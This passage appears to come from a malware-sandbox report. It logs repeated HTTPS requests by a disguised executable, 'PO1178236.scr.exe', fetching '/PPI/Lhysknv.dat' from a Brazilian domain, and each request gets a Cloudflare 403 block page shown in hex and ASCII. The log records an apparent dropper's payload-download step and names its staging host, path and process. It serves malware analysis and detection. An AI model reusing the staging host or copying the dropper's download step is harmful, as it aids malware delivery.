        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:23 UTC1369INData Raw: 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65
        Data Ascii: red! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" conte
        2025-01-09 07:36:23 UTC1369INData Raw: 3d 22 63 66 2d 73 65 63 74 69 6f 6e 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69
        Data Ascii: ="cf-section cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </di
        2025-01-09 07:36:23 UTC1369INData Raw: 6e 74 65 72 20 73 6d 3a 74 65 78 74 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 31 38 61 35 61 39 38 34 32 31 33 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74
        Data Ascii: nter sm:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c18a5a984213</strong></span> <span class="cf-footer-separat
        2025-01-09 07:36:23 UTC1012INData Raw: 73 63 72 69 70 74 3e 0a 20 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 31 38 61 35 61 39 38 34 32 31 33 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 45 34 4d 79 34 77 4d 44
        Data Ascii: script> window._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c18a5a984213',t:'MTczNjQwODE4My4wMD
        2025-01-09 07:36:23 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        45192.168.2.949753188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:23 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:24 UTC1005INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:24 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:36:39 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xJ2Gd%2FlMXX4STJ2s2d6jApM9b7wMG4NCfQX0tdHBReW3DETS%2Bor%2BelBfVZaxy6Vg7zmVcN0oUlxQAinMSmNa2Ia4csG4wUYNRkXUqYz2ofKbLlR2oUgHNzeCkRtCtjdI5CTsGVNOoheIFzyd"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c18e29a543ed-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=2011&min_rtt=1999&rtt_var=773&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1393794&cwnd=210&unsent_bytes=0&cid=4e44ae4eb0e81e8a&ts=147&x=0"
        2025-01-09 07:36:24 UTC364INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:24 UTC1369INData Raw: 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69
        Data Ascii: are</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=devi
        2025-01-09 07:36:24 UTC1369INData Raw: 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63 61 70 74 63
        Data Ascii: f-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.captc
        2025-01-09 07:36:24 UTC1369INData Raw: 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 31 38 65 32 39 61 35 34 33 65 64 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e
        Data Ascii: eft border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c18e29a543ed</strong></span> <span class="cf-footer-separator sm:hidden">
        2025-01-09 07:36:24 UTC998INData Raw: 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 31 38 65 32 39 61 35 34 33 65 64 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 45 34 4e 43 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76 61 72 20 61
        Data Ascii: ow._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c18e29a543ed',t:'MTczNjQwODE4NC4wMDAwMDA='};var a
        2025-01-09 07:36:24 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        46192.168.2.949754188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:24 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:24 UTC1001INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:24 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:36:39 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2ZXYyiV1I7mwGU3KxmFz%2Bq0nBFfWCBE9tyXMv8V1xP3bj26POvy3eao5zsvbxmDiyHyCF29OliWUgKfioCdMUzvLaX2h1rhZro25XbQlzm1WMzGQcvtYqizFjwCVZdRLxGJhe1z0Ohxm36tz"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c1921c854282-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1692&min_rtt=1689&rtt_var=636&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1728833&cwnd=252&unsent_bytes=0&cid=d3478ce0ba50780d&ts=149&x=0"
        2025-01-09 07:36:24 UTC368INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:24 UTC1369INData Raw: 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77
        Data Ascii: /title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-w
        2025-01-09 07:36:24 UTC1369INData Raw: 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63 61 70 74 63 68 61 2d 63
        Data Ascii: ghlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.captcha-c
        2025-01-09 07:36:24 UTC1369INData Raw: 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 31 39 32 31 63 38 35 34 32 38 32 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c
        Data Ascii: border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c1921c854282</strong></span> <span class="cf-footer-separator sm:hidden">&bul
        2025-01-09 07:36:24 UTC994INData Raw: 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 31 39 32 31 63 38 35 34 32 38 32 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 45 34 4e 43 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76 61 72 20 61 3d 64 6f 63
        Data Ascii: cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c1921c854282',t:'MTczNjQwODE4NC4wMDAwMDA='};var a=doc
        2025-01-09 07:36:24 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        47192.168.2.949755188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:25 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:25 UTC1003INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:25 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:36:40 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=922ydS7vBjhJwqN2eNdgnh2CpJuuflSW5HGdE1es1tVDSYxSRW%2F5vGKmqi5K8ZUY7NnqFK8Dun2T5Bx5aSvsNA3ETPVaX8XZK%2FK8869pNpVm5RunHI13uvWoXimQHbsK0Vzh2axmQvGawdtE"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c195f8b34258-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1934&min_rtt=1913&rtt_var=759&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1403171&cwnd=181&unsent_bytes=0&cid=0d821a041d1cf2df&ts=150&x=0"
        2025-01-09 07:36:25 UTC366INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:25 UTC1369INData Raw: 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65
        Data Ascii: e</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device
